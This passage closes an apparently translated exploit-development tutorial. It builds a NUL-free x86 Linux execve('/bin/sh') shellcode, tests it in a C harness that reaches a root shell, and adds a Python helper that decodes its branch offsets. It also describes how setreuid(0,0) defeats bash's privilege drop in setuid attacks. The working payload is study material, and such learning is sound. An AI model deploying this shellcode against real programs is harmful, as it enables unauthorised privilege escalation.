 80483ec:       2f                      das
 80483ed:       62 69 6e                bound  %ebp,0x6e(%ecx)
 80483f0:       2f                      das
 80483f1:       73 68                   jae    804845b <gcc2_compiled.+0x1b>
=============================================================================

It shrank by 10 bytes. The duplicated xor instructions were merged, and the
exit(0) part was dropped: once /bin/sh runs it replaces the program in memory,
so exit(0) is never reached, and when the shell exits, everything ends anyway.

Now write the bytes out in hex, joined into one string.

\xeb\x15\x31\xc0\x5b\x89\x43\x07\x89\x1e\x89\x46\x04\xb0\x0b\x31\xe4\x8d\x0e
\x31\xd2\xcd\x80\xe8\xe6\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68  

This is the completed shellcode. Let's check that it runs inside another
program.

=========================================================================
char code[] = "\xeb\x15\x31\xc0\x5b\x89\x43\x07\x89\x1e\x89\x46\x04"
			"\xb0\x0b\x31\xe4\x8d\x0e\x31\xd2\xcd\x80\xe8\xe6\xff"
			"\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
int main()
{
        void (*pointer)(void);
        pointer = (void (*)(void))code;
        pointer();
}
=========================================================================

=========================================================================
[root@hackerschool assem]# gcc -o shell shell.c
[root@hackerschool assem]# ./shell
sh-2.05a# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
sh-2.05a# exit
exit
[root@hackerschool assem]#
=========================================================================
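The checks the text performs by hand above (resolving a jmp or call displacement back to the code it reaches, and scanning for \x00 bytes) can be automated when analysing a captured byte sequence. This is an added example, not part of the original document: the two byte strings are typed in from the page's own listings, and the function names are this example's own.

```python
import struct

# Constructed input, typed in from the listings above: the 37 code bytes of the
# jmp/call/pop write() version (without its trailing string) ...
WRITE_CODE = bytes.fromhex(
    "eb1e b804000000 bb01000000 59 ba11000000 cd80"
    "b801000000 bb00000000 cd80 e8ddffffff")
# ... and the final 35-byte NUL-free execve version.
SHELL_CODE = bytes.fromhex(
    "eb15 31c0 5b 894307 891e 894604 b00b 31e4 8d0e 31d2 cd80"
    "e8e6ffffff 2f62696e2f7368")


def branch_target(blob, off):
    """Decode a short jmp (EB rel8) or a near call/jmp (E8/E9 rel32) found at
    offset `off` and return (mnemonic, displacement, target offset).
    The displacement is signed and relative to the byte after the instruction,
    which is why dd ff ff ff (0xffffffdd) on the page means 35 bytes back."""
    op = blob[off]
    if op == 0xEB:
        disp, size, name = struct.unpack_from("<b", blob, off + 1)[0], 2, "jmp"
    elif op in (0xE8, 0xE9):
        disp = struct.unpack_from("<i", blob, off + 1)[0]
        size, name = 5, ("call" if op == 0xE8 else "jmp")
    else:
        raise ValueError(f"offset {off}: {op:#04x} is not EB/E8/E9")
    return name, disp, off + size + disp


def nul_offsets(blob):
    """Offsets of every 0x00 byte: a strcpy()-style copy stops at the first."""
    return [i for i, b in enumerate(blob) if b == 0]


def jmp_call_pop_layout(blob):
    """Follow the jmp at offset 0 to the call, resolve the call back to the
    code, and report where the string that the pop will receive starts."""
    jmp_name, _, call_off = branch_target(blob, 0)
    call_name, disp, code_off = branch_target(blob, call_off)
    if (jmp_name, call_name) != ("jmp", "call"):
        raise ValueError("expected a jmp leading to a call")
    return {"call_at": call_off, "call_disp": disp,
            "code_at": code_off, "string_at": call_off + 5}


if __name__ == "__main__":
    for label, blob in (("write", WRITE_CODE), ("shell", SHELL_CODE)):
        print(label, len(blob), "bytes", jmp_call_pop_layout(blob),
              "NULs at", nul_offsets(blob))
    start = jmp_call_pop_layout(SHELL_CODE)["string_at"]
    print("string after the call:", SHELL_CODE[start:])
```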

Done. With that, the shellcode is finished. One more thing should be said
about the shell it spawns: this shellcode alone is no longer enough to obtain
a root shell. From version 7.0 of this distribution (Red Hat) onward, /bin/sh
(bash) also checks privileges, so a /bin/sh started from an exploited program
runs not with that program's privileges but with those of the user who ran it.
If a user named mirable attacks a root setuid program with this shellcode and
runs /bin/sh, the shell runs as mirable, not as root. The usual solution is to
call setreuid(0,0) before running the shell. There is also shellcode that
escapes a chroot(), and shellcode for network environments such as bindshell
and reverse telnet; those belong to advanced shellcode and are covered
separately. This document has kept to the basics of making shellcode.
